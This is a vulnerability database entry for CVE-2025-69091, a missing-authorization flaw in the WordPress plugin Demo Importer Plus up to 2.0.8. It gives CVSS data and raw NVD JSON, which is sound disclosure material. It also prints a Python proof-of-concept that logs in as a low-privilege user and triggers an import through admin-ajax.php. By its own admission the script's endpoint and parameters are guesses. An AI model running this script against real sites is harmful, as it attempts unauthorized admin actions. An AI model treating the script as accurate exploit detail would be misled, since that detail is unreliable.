Security Vulnerability Report
中文
CVE-2025-69091 CVSS 4.3 MEDIUM

CVE-2025-69091

Published: 2025-12-30 11:16:02
Last Modified: 2026-04-15 00:35:42

Description

Missing Authorization vulnerability in Kraft Plugins Demo Importer Plus demo-importer-plus allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Demo Importer Plus: from n/a through <= 2.0.8.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Demo Importer Plus <= 2.0.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-69091 PoC - Demo Importer Plus Broken Access Control # Target: WordPress site with Demo Importer Plus plugin <= 2.0.8 target_url = "http://target-wordpress-site.com" # Step 1: Identify WordPress and plugin # Check if demo-importer-plus is installed check_plugin = requests.get( f"{target_url}/wp-content/plugins/demo-importer-plus/readme.txt" ) # Step 2: Exploit the missing authorization # The plugin's import functionality lacks proper capability checks # Low-privilege users can trigger admin-only functions exploit_data = { "action": "demo_importer_plus_import", "demo_type": "full_import", "nonce": "", # May not be properly validated } # As an authenticated low-privilege user (subscriber role) session = requests.Session() # Login as low-privilege user session.post( f"{target_url}/wp-login.php", data={ "log": "low_priv_user", "pwd": "user_password" } ) # Step 3: Trigger the vulnerable function response = session.post( f"{target_url}/wp-admin/admin-ajax.php", data=exploit_data ) print(f"Status: {response.status_code}") print(f"Response: {response.text}") # Note: This PoC demonstrates the concept. Actual exploitation # requires identifying specific vulnerable endpoints and parameters.

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69091", "sourceIdentifier": "[email protected]", "published": "2025-12-30T11:16:02.443", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Kraft Plugins Demo Importer Plus demo-importer-plus allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Demo Importer Plus: from n/a through <= 2.0.8."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/demo-importer-plus/vulnerability/wordpress-demo-importer-plus-plugin-2-0-8-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}